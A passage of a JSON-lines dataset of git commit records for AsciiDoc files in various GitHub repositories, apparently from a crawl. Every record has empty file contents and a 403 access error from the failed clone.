2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f976812ca0a094b0d580b51b0e52d128b7cfe","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3989d4d62b0efc5dd89fd0f127ece78e1dd09bc7","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8976dbb844cf809b490fa56c3df6e76b76ee7d","subject":"Update 2019-11-23-one-year-later.adoc","message":"Update 2019-11-23-one-year-later.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-23-one-year-later.adoc","new_file":"_posts\/2019-11-23-one-year-later.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1c5ba68387d58b4330648ab04b229729c9fb16","subject":"Create 2014-07-22-forge-2.7.2.final.asciidoc","message":"Create 2014-07-22-forge-2.7.2.final.asciidoc","repos":"addonis1990\/docs,forge\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,luiz158\/docs","old_file":"news\/2014-07-22-forge-2.7.2.final.asciidoc","new_file":"news\/2014-07-22-forge-2.7.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f94904e6ae4703713cf9c742f205624491770d84","subject":"Update 2016-03-16-c.adoc","message":"Update 2016-03-16-c.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-16-c.adoc","new_file":"_posts\/2016-03-16-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f437b330c86c0bd2631f5d97278b76b650a8e7f2","subject":"Update 2017-05-30-2.adoc","message":"Update 2017-05-30-2.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-05-30-2.adoc","new_file":"_posts\/2017-05-30-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8267565ec9fda3093a9bb8e20d7f69437ac028","subject":"add events-feed page","message":"add events-feed page\n","repos":"clojure\/clojure-site","old_file":"content\/events-feed.adoc","new_file":"content\/events-feed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5e7c4fcf04a5007857a0d1b70bd0fc9d986e3512","subject":"Added reference to byteman","message":"Added reference to 
byteman\n","repos":"ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0.1.0-demo.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0.1.0-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49eef9610961fb809359fc20123884ccaea74101","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfbd8b4b5625bf7fb407c6aad64f67e5efb9f885","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a8376694e7689e35ba57341f544976d5d2c99f","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"001b301a2112008ae1830ca98c5026772b75874a","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5037f716a0f57982562cc99f14ef7307d0e9aa41","subject":"Update 2017-04-05-Make-log-work-first.adoc","message":"Update 2017-04-05-Make-log-work-first.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-Make-log-work-first.adoc","new_file":"_posts\/2017-04-05-Make-log-work-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ea60e00129d3c65e15b7d935d461c9225b9fa8","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f882b79fe71397436b4ccef5517ba77197e93103","subject":"Use docker linking between hawkular-services and cassandra","message":"Use docker linking between hawkular-services and cassandra\n\nThis is a bit simpler than getting the ip address of the container\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"docker-dist\/README.adoc","new_file":"docker-dist\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2090d5c56ccb35b01b311497242bfe4ea7715f55","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cee1373f6f5b39c958a663f9bcb133cdddb406cf","subject":"Update 2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","message":"Update 
2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","new_file":"_posts\/2015-07-14-Creating-an-Insightly-CRM-opportunity-via-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fce5fc72da28bfc976c6e318a0234cb1447557","subject":"Update 2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","message":"Update 2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","new_file":"_posts\/2018-07-01-Save-time-at-diary-automating-recurring-tasks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a2495f6305665ce025efc1cb8d8d8be7cff0403","subject":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embeded-math-formula.adoc'\"","message":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embeded-math-formula.adoc'\"\n\nThis reverts commit 13448bc5898528f6eb4d769a8c5be70ee11c0791.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_file":"_posts\/2019-01-31-draft-embeded-math-formula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c71b6df0eedc6ad3a153cd55159f18817482792","subject":"Update Two_Factor_PAM_Configuration.adoc","message":"Update Two_Factor_PAM_Configuration.adoc","repos":"eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3e0a7f7972776081b7006ce3fd711b8c496ca1e6","subject":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","message":"Update 2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","new_file":"_posts\/2015-11-01-Despliegue-de-entorno-base-de-trabajo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a611a302cefae6b11eede18927ce0223503ea7fc","subject":"Update 2016-01-04-Managing-technical-debt-in-own-garage.adoc","message":"Update 
2016-01-04-Managing-technical-debt-in-own-garage.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-04-Managing-technical-debt-in-own-garage.adoc","new_file":"_posts\/2016-01-04-Managing-technical-debt-in-own-garage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2229557859472d8bd3870a04ce4e5c141777fb46","subject":"Update 2016-12-06-problem-solving-Java.adoc","message":"Update 2016-12-06-problem-solving-Java.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-Java.adoc","new_file":"_posts\/2016-12-06-problem-solving-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dc49a18044cc544828854dfbe7127b35fe7817c","subject":"Update 2017-12-01-Christmas-Gift-Ideas.adoc","message":"Update 2017-12-01-Christmas-Gift-Ideas.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Christmas-Gift-Ideas.adoc","new_file":"_posts\/2017-12-01-Christmas-Gift-Ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3358f60a5649bd0dfc98d75af4d1bc0eb29cdc09","subject":"Update 2018-02-26-make-book-manage-App.adoc","message":"Update 2018-02-26-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-make-book-manage-App.adoc","new_file":"_posts\/2018-02-26-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b74a1bfc9c5966c84d7510d90dcd1f380fc8a4c","subject":"Update 2019-01-31-draft-embedded-image.adoc","message":"Update 2019-01-31-draft-embedded-image.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c95794539be92a5b81128880504f82a86058f7a","subject":"Initial logging docs","message":"Initial logging docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/logging-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/logging-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccde9936610949f3de3705416d927a68cd3334a3","subject":"Added Stop EIP docs","message":"Added Stop EIP docs\n","repos":"nikhilvibhav\/camel,kevinearls\/camel,ullgren\/camel,kevinearls\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,objectiser\/camel,curso007\/camel,gautric\/camel,onders86\/camel,tadayosi\/camel,snurmine\/camel,nikhilvibhav\/camel,curso007\/camel,dmvolod\/camel,pmoerenhout\/camel,tdiesler\/camel,gnodet\/camel,davidkarlsen\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,sverkera\/camel,nikhilvibhav\/camel,adessaigne\/camel,onders86\/camel,akhettar\/camel,zregvart\/camel,curso007\/camel,tdiesler\/camel,snurmine\/camel,sverkera\/camel,CodeSmell\/camel,apache\/camel,sverkera\/camel,zregvart\/camel,apache\/camel,dmvolod\/camel,gnodet\/camel,Fabryprog\/camel,apache\/camel,pax95\/camel,dmvolod\/camel,cunningt\/camel,alvinkwekel\/camel,cunningt\/camel,tadayosi\/camel,jonmcewen\/camel,jamesnetherton\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,gautric\/camel,jonmcewen\/camel,cunningt\/camel,anoordover\/camel,gautric\/camel,DariusX\/camel,jonmcewen\/camel,tdiesler\/camel,nikhilvibhav\/camel,pax95\/camel,sverkera\/camel,christophd\/camel,anoordover\/camel,Fabryprog\/camel,christophd\/camel,CodeSmell\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,CodeSmell\/camel,snurmine\/camel,ullgren\/camel,cunningt\/camel,curso007\/camel,jamesnetherton\/camel,jamesnetherton\/camel,sverkera\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,jonmcewen\/camel,adessaigne\/camel,cunningt\/camel,anoordover\/camel,DariusX\/camel,snurmine\/camel,akhettar\/camel,gautric\/camel,anoordover\/camel,adessaigne\/camel,onders86\/camel,gautric\/camel,mcollovati\/camel,davidkarlsen\/camel,pmoerenhout\/camel,adessaigne\/camel,davidkarlsen\/camel,pmoerenhout\/camel,akhettar\/camel,gnodet\/camel,jamesnetherton\/camel,DariusX\/camel,kevinearls\/camel,Fabryprog\/camel,onders86\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,jonmcewen\/camel,snurmine\/camel,tdiesler\/camel,pmoerenhout\/camel,gautric\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tdiesler\/camel,kevinearls\/camel,curso007\/camel,nicolaferraro\/camel,akhettar\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,cunningt\/camel,Fabryprog\/camel,dmvolod\/camel,zregvart\/camel,ullgren\/camel,tdiesler\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,akhettar\/camel,akhettar\/camel,tadayosi\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,davidkarlsen\/camel,dmvolod\/camel,nicolaferraro\/camel,zregvart\/camel,dmvolod\/camel,objectiser\/camel,nicolaferraro\/camel,tadayosi\/camel,punkhorn\/camel-upstream,sverkera\/camel,mcollovati\/camel,snurmine\/camel,punkhorn\/camel-upstream,kevinearls\/camel,alvinkwekel\/camel,kevinearls\/camel,jonmcewen\/camel,objectiser\/camel,curso007\/camel,anoordover\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/stop-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/stop-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e69a1493586f26b52285c577aafd6aeed93622f","subject":"Update 2015-10-29-This-is-my-first-post.adoc","message":"Update 
2015-10-29-This-is-my-first-post.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9f0c45d6c0c606877495a3dc47b58e0fee00aac","subject":"add info","message":"add info\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-03-01-09-links.asciidoc","new_file":"content\/online\/2015-03-01-09-links.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"988ccc38c5b1f183c8497f596a91ca4bc5574858","subject":":memo: cVim","message":":memo: cVim\n","repos":"syon\/refills","old_file":"src\/refills\/chrome\/cvim.adoc","new_file":"src\/refills\/chrome\/cvim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a292a23de17cdf0f2543bc1d8ff5f9c884544640","subject":"fix goto commands documention in README","message":"fix goto commands documention in README\n","repos":"Asenar\/kakoune,danielma\/kakoune,flavius\/kakoune,Asenar\/kakoune,Somasis\/kakoune,danr\/kakoune,occivink\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,rstacruz\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,xificurC\/kakoune,xificurC\/kakoune,elegios\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,casimir\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,danr\/kakoune,jjthrash\/kakoune,jkonecny12\/kakoune,danr\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,ekie\/kakoune,flavius\/kakoune,elegios\/kakoune,Asenar\/kakoune,ekie\/kakoune,elegios\/kakoune,zakgreant\/kakoune,flavius\/kakoune,Somasis\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,lenormf\/kakoune,alpha123\/kakoune,occivink\/kakoune,elegios\/kakoune,rstacruz\/kakoune,danielma\/kakoune,alpha123\/kakoune,casimir\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,Asenar\/kakoune,xificurC\/kakoune,ekie\/kakoune,occivink\/kakoune,ekie\/kakoune,zakgreant\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,mawww\/kakoune,jjthrash\/kakoune,jjthrash\/kakoune,mawww\/kakoune,lenormf\/kakoune,danr\/kakoune,alpha123\/kakoune,alpha123\/kakoune,occivink\/kakoune,Somasis\/kakoune,mawww\/kakoune,rstacruz\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"66e24383153af91638d102f2cbe12871a32e5730","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site","message":"Adding release notes for 
release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211006-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211006-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00f3146ae8d719f06836fc4150447870b63ccd4d","subject":"Update 2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83fb65cbc33b9c65cabfd0259d7dd0428254fefe","subject":"Renamed '_posts\/2017-08-24-Test-Post.adoc' to '_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc'","message":"Renamed '_posts\/2017-08-24-Test-Post.adoc' to '_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc'","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb92350d774c7cfc5bea0ef3270e06f95ae963ea","subject":"Update 2015-06-27-Test.adoc","message":"Update 2015-06-27-Test.adoc","repos":"Le6ow5k1\/le6ow5k1.github.io,Le6ow5k1\/le6ow5k1.github.io,Le6ow5k1\/le6ow5k1.github.io","old_file":"_posts\/2015-06-27-Test.adoc","new_file":"_posts\/2015-06-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Le6ow5k1\/le6ow5k1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e9719abd7ae9018def43c7f95ed493a077be24","subject":"Update 2015-10-29-Test.adoc","message":"Update 2015-10-29-Test.adoc","repos":"fgracia\/fgracia.github.io,fgracia\/fgracia.github.io,fgracia\/fgracia.github.io","old_file":"_posts\/2015-10-29-Test.adoc","new_file":"_posts\/2015-10-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 